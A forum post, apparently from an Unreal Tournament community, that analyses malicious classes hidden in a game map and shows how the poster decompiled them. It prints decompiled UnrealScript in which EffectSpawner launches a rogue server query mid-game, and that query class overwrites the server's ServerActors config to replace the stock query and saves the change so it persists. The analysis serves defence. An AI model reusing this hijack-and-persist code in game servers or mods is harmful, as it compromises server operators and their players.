Untitled

Oh, of course, I forgot about this. You can open the map in UnrealEd, go into the log and save each package (SUnreal and MyLevel) as .U files, then open them in UTPT. When in UTPT, hit 'Decompile' on each class (UBrowserServerQuery and EffectSpawner), and it shows the hidden code. I can see the malicious code in both classes, except, I am unsure how custom queries were parsed and sent through the custom query class, as I do not see code for that in this class. However, I do see the backwards-compatible check Casey mentioned he threw into the query (he compiled this in 225 he claimed) which replaces the normal server query with the custom one, and I also see why the EffectSpawner class was hidden in the map; it spawns the query mid-game. Here is the malicious code I noted so far.

Effect Spawner Class

Code:

class EffectSpawner extends Info;

function PostBeginPlay ()
{
  SetTimer(5.0,False);
}

function Timer ()
{
  Spawn(Class'UBrowserServerQuery');
}


UBrowserServerQuery Class


Code:

function PostBeginPlay ()
{
  local UdpBeacon Beacon;
  local GameEngine G;
  local int i;

  if (! int(Level.GetPropertyText("EngineSubVersion")) > 0 ) goto JL00E0;
  foreach UnknownFunction602(Class'GameEngine',G) {
JL003F:
  i = 0;
  if (! i < 20 ) goto JL00DE;
  if (! InStr(Caps(G.GetPropertyText("ServerActors[" $ string(i) $ "]")),"UDPSERVERQUERY") != -1 ) goto JL00D4;
  G.SetPropertyText("ServerActors[" $ string(i) $ "]",string(Class));
  G.SaveConfig();
  goto JL00DE;
  i++;
  goto JL003F;
  }
  foreach AllActors(Class'UdpBeacon',Beacon) {
  Beacon.UdpServerQueryPort = Port;
  }
  Super.PostBeginPlay();
JL00E0:
}


** Ignore random things such as JL00E0 (though I'm sure you're already well aware of this), since UTPT just puts that crap in when decompiling.

Of course, I'm sure you probably have better ways of decoding this, however I am just trying to help as much as I can, since I know you have a lot to deal with in real life and this is just more drama / stress added on.